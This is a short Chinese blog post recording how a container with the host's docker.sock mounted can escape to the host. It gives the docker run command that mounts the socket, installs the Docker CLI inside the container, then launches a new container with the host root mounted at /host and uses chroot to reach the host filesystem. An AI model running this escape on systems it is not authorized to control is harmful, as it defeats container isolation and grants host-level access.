容器逃逸 --with docker.sock
2024-09-18 22:42:27
容器逃逸 --with docker.sock
本人对于容器逃逸的基本理解就是用户从容器中逃出去到宿主机里去了。
本文意在记录一个使用 docker.sock 来进行容器逃逸的方法。
首先随便来个镜像,这里选用 ubuntu:20.04
docker pull ubuntu:20.04
docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock -d ubuntu:20.04
可以看到这里挂载了 docker.sock 到容器内。
进入容器并下载 docker-ce-cli
apt update
apt-get install ca-certificates curl gnupg lsb-release
mkdir -p /etc/apt/keyrings
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | gpg --dearmor -o /etc/apt/keyrings/docker.gpg
echo \
"deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu \
$(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
apt-get update
apt-get install docker-ce-cli
然后运行一个新的容器:
docker run -it -v /:/host ubuntu:20.04 bash
可以看到这里把根目录挂载到了新的容器内,要注意这个根目录可不是当前容器的根目录,而是当前容器的宿主机的根目录,在新的容器内,我们执行
chroot /host
这样就可以在新的容器内直接访问宿主机的文件系统了,实现了逃逸。
最新文章
- SQL Sever无法打开链接对话框,未将对象引用设置到对象的实例。(AppIDPackage)
- CommonJS,AMD,CMD区别
- 【解决方案】安装vssdk_full.exe遇到的问题
- 02 C语言指针
- 使用 GitHub / GitLab 的 Webhooks 进行网站自动化部署
- javascript 毫秒转日期 日期时间转毫秒
- English article1
- PHP前端$.ajax传递数据到后台
- 音乐API之QQ音乐
- Redis之持久化(RDB AOF)
- openstack Q版部署-----界面horizon安装(9)
- jenkins 安装网址
- c++11 线程池学习笔记 (一) 任务队列
- java对PDF文档的各种操作
- [Artoolkit] ARSimpleNativeCarsProj for Multi Markers Tracking
- JavaScript基本内容
- IOS初级:UIScrollView & UIPageControl
- 深入了解preventDefault与stopPropagation
- Arithmatic项目修改总结
- Postman简明教程